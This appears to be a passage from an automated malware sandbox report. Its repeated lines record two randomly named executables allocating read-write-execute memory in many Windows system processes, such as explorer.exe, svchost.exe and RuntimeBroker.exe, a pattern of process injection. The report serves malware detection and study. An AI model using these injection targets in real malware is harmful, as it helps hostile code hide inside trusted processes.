            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: CB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 300000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 720000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 430000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8830000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 940000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 310000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 600000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 730000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 440000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8860000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 950000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: CD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 320000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 610000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 740000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 450000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8870000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 960000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 110000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 330000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 620000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 750000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 460000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 89A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 970000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 120000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: CF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 340000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 630000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 760000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 470000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: D00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 350000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 640000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 770000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: BA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 480000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: CA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 990000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: FA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: D10000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\sihost.exe base: EC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\svchost.exe base: B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1490000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\explorer.exe base: B8C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: 17A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 13C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 19D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 14C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1450000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: C20000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1740000 protect: page execute and read and writeJump to behavior
